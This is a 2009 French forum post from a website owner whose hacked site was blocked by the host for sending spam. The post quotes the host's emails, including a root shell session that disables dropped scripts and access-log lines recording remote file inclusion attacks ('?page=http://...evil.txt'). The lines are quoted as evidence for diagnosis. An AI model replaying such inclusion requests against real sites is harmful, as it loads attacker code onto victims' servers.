Posté : 30-01-2009 18:54
Bonjour,
J'ai été victime du piratage de mon site, ce matin, il affichait une page internet, comme quoi il a été hacké par la "Turk Attack team". J'ai donc remplacé cette page index, par l'ancienne. Le site a pu repartir.
Ensuite, j'ai cherché sur internet comment sécurisé mon site, j'ai trouvé quelques trucs, (notamment au niveau du .htaccess), que j'ai appliqué.
Ce soir, mon site n'est plus accessible, car mon hébergeur vient de bloquer tout accès, une page 403 est donc visible lorsque je me rends sur mon site.
Mon hébergeur (1and1) me demande de remédier aux problèmes dans mes scripts, mais je n'ai plus accès en FTP à mon site ...
Bref, ils m'ont envoyé un mail m'indiquant :
----
Depuis notre dernier courrier, nous avons reçu de nouvelles plaintes concernant
l'envoi de spam à partir de votre espace web 1&1.
L'envoi de spam représentant un danger imminent pour notre infrastructure, votre
espace web sera bloqué suite à ce message.
Pour le débloquer, veuillez nous faire part des délais dans lesquels vous saurez
vous adresser au problème. Pour ce faire, merci de répondre à cet email en
laissant notre référence REF dans votre message.
Dans le cas où l'envoi de spam a été extrêmement massif, ce message peu avoir
été envoyé très peu de temps après notre première notification. Dans ce cas,
nous regrettons que vous n'auriez pas eu le temps de trouver solution au
problème et éviter le blocage. Toutefois, le blocage est indispensable pour la
protection de notre infrastructure.
----
Puis un autre :
----
Mes collègues de notre division " Administration Serveurs " nous
informent qu'un script non sécurisé fût détecté sur votre compte client
***.
root@infong11:/kunden/homepages/1/d145180228/htdocs# chmod -v 000
license.php perl.pl errors.php
mode of `license.php' changed to 0000 (---------)
mode of `perl.pl' changed to 0000 (---------)
mode of `errors.php' changed to 0000 (---------)
root@infong11:/kunden/homepages/1/d145180228/htdocs# ln -sv
/usr/lib/php.ini-nourl php.ini
create symbolic link `php.ini' to `/usr/lib/php.ini-nourl'
151.66.131.59 - - [27/Jan/2009:11:20:28 +0100] "GET
//?page=http://ks27457.myhostlife.org/evil.txt2?? HTTP/1.1" 200 3309
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
151.66.131.59 - - [27/Jan/2009:11:22:34 +0100] "GET
//?page=http://ks27457.myhostlife.org/spread.txt?? HTTP/1.1" 200 3329
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
Vous êtes invité à sécuriser le plus rapidement possible ce script, il
est déjà possible que ce dernier soit suspendu suivant le risque que ce
dernier représenterait.
Nous vous remercions pour votre compréhension et votre collaboration au
traitement de cette alerte.
----
Le problème c'est que je n'y comprends pas grand chose dans ces lignes. Je sais simplement qu'un script a du envoyé massivement du spam, mais pour le second mail, je ne sais pas quoi faire.
Quelqu'un pourrait m'aider s'il vous plait ? |